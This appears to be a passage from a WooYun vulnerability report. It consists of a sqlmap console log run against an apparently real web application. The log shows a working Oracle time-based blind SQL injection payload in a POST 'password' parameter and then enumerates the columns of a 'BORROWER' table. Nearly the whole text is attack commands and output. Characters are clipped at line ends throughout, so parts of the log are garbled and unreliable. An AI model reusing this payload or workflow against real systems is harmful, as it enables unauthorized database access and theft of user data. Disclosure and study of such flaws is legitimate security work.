WooYun.org

D:\Python27\sqlmap>sqlmap.py -r 1.txt --columns -T "BORROWER" users-D "A!I\X05"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150724}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 23:07:41
[23:07:41] [INFO] parsing HTTP request from '1.txt'
[23:07:46] [INFO] resuming back-end DBMS 'oracle'
[23:07:46] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Parameter: password (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: mailId=123&password=123' AND 4634=DBMS_PIPE.RECEIVE_MESSAGE(CHR(12
)||CHR(109)||CHR(114)||CHR(72),5) AND 'rQMT'='rQMT
---
[23:07:46] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[23:07:46] [WARNING] missing database parameter. sqlmap is going to use the cur
ent database to enumerate table(s) columns
[23:07:46] [INFO] fetching current database
[23:07:46] [INFO] resumed: C1
[23:07:46] [WARNING] on Oracle you'll need to use schema names for enumeration
s the counterpart to database names on other DBMSes
[23:07:46] [INFO] fetching columns for table 'BORROWER' in database 'C1'
[23:07:46] [INFO] resumed: 0
[23:07:46] [ERROR] unable to retrieve the number of columns for table 'BORROWER
 in database 'C1'
[23:07:46] [WARNING] unable to retrieve column names for table 'BORROWER' in da
abase 'C1'
Database: C1
Table: BORROWER
[47 columns]
+--------------------------+-------------+
| Column                   | Type        |
+--------------------------+-------------+
| AGENTID                  | non-numeric |
| ALLOWDELPOST             | non-numeric |
| CAMPO_BOL                | non-numeric |
| CELL_LINE_ID             | non-numeric |
| CLIENT_NAME              | non-numeric |
| CONVERGE_PASS_SALT       | non-numeric |
| CP_ID                    | non-numeric |
| CPR                      | non-numeric |
| CT_ID                    | non-numeric |
| DD                       | non-numeric |
| DEPENDENT_NAME           | non-numeric |
| DISPLAY_NAME             | non-numeric |
| EMP_ID                   | non-numeric |
| EXPERIMENTAL_DATA_SET_ID | non-numeric |
| FEW                      | non-numeric |
| FLDFUNMEMO               | non-numeric |
| FREEWAY                  | non-numeric |
| HTML                     | non-numeric |
| IDDESIGN                 | non-numeric |
| JFCONTACTS               | non-numeric |
| JOOMLA                   | non-numeric |
| LOGOUT                   | non-numeric |
| MODEL                    | non-numeric |
| NB                       | non-numeric |
| O_ID                     | non-numeric |
| ORDERDATE                | non-numeric |
| PART_ID                  | non-numeric |
| PERSONID                 | non-numeric |
| PLUGINVARID              | non-numeric |
| POI_ID                   | non-numeric |
| PROGENITOR_ID            | non-numeric |
| REGIONID                 | non-numeric |
| SALESPERSON_ID           | non-numeric |
| SEMESTER                 | non-numeric |
| SERIAL_NO                | non-numeric |
| SITE_ID                  | non-numeric |
| STAFF_NUMBER             | non-numeric |
| STANDORT_NR              | non-numeric |
| STOREID                  | non-numeric |
| THE_GEOM                 | non-numeric |
| TIDFORNECEDOR            | non-numeric |
| TOKEN                    | non-numeric |
| TRANSACTION_ID           | non-numeric |
| VALOR3                   | non-numeric |
| VALOR4                   | non-numeric |
| WIND                     | non-numeric |
| ZONE_ID                  | non-numeric |
+--------------------------+-------------+